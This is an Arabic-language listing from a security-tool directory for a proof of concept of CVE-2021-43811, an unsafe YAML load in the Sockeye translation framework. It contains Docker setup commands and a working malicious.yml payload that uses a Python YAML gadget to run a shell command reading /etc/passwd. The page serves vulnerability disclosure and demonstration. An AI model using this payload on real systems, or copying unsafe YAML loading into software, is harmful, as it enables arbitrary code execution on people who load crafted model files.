Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2021-43811 — awslabs/sockeye حقن كود عبر تحميل YAML غير آمن CVE-2021-43811 | Kitploit
أدوات/GitHubGitHub/s-index/cve-2021-43811
توليد الحمولةتحليل الثغرات الأمنيةتحليل الكودالاستغلالالأوراق والأبحاثالتعلم والتعليم
GitHubs-index/cve-2021-43811

CVE-2021-43811

awslabs/sockeye حقن كود عبر تحميل YAML غير آمن CVE-2021-43811

عرض المستودع
2249منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2021-43811

awslabs/sockeye حقن كود عبر تحميل YAML غير آمن CVE-2021-43811

وصف NVD

Sockeye هو إطار عمل مفتوح المصدر من تسلسل إلى تسلسل للترجمة الآلية العصبية مبني على PyTorch. يستخدم Sockeye ملفات YAML لتخزين إعدادات النموذج والبيانات على القرص. الإصدارات الأقل من 2.3.24 تستخدم تحميل YAML غير آمن، والذي يمكن أن يُجبر على تنفيذ كود عشوائي مضمّن في ملفات الإعداد. يمكن للمهاجم إضافة كود خبيث إلى ملف إعداد نموذج مُدرَّب ومحاولة إقناع المستخدمين بتنزيله وتشغيله. إذا قام المستخدمون بتشغيل النموذج، فسيتم تنفيذ الكود المضمّن محليًا. تم إصلاح المشكلة في الإصدار 2.3.24.

العرض التوضيحي

cve-2021-43811

الإعداد

  1. أنشئ صورة من Dockerfile
root@kitploit:~
docker build -t cve-2021-43811 .
  1. شغّل python main.py في حاوية جديدة
root@kitploit:~
docker run -it --rm cve-2021-43811

إخراج /etc/passwd

root@kitploit:~
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
-- snip --

output-image

حمولة PoC

malicious.yml

root@kitploit:~
!!python/object/new:type
args: ['z', !!python/tuple [], {'extend': !!python/name:exec }]
listitems: "__import__('os').system('cat /etc/passwd')"

المراجع

  • https://github.com/awslabs/sockeye/security/advisories/GHSA-ggmr-44cv-24pm
تنزيل الأداة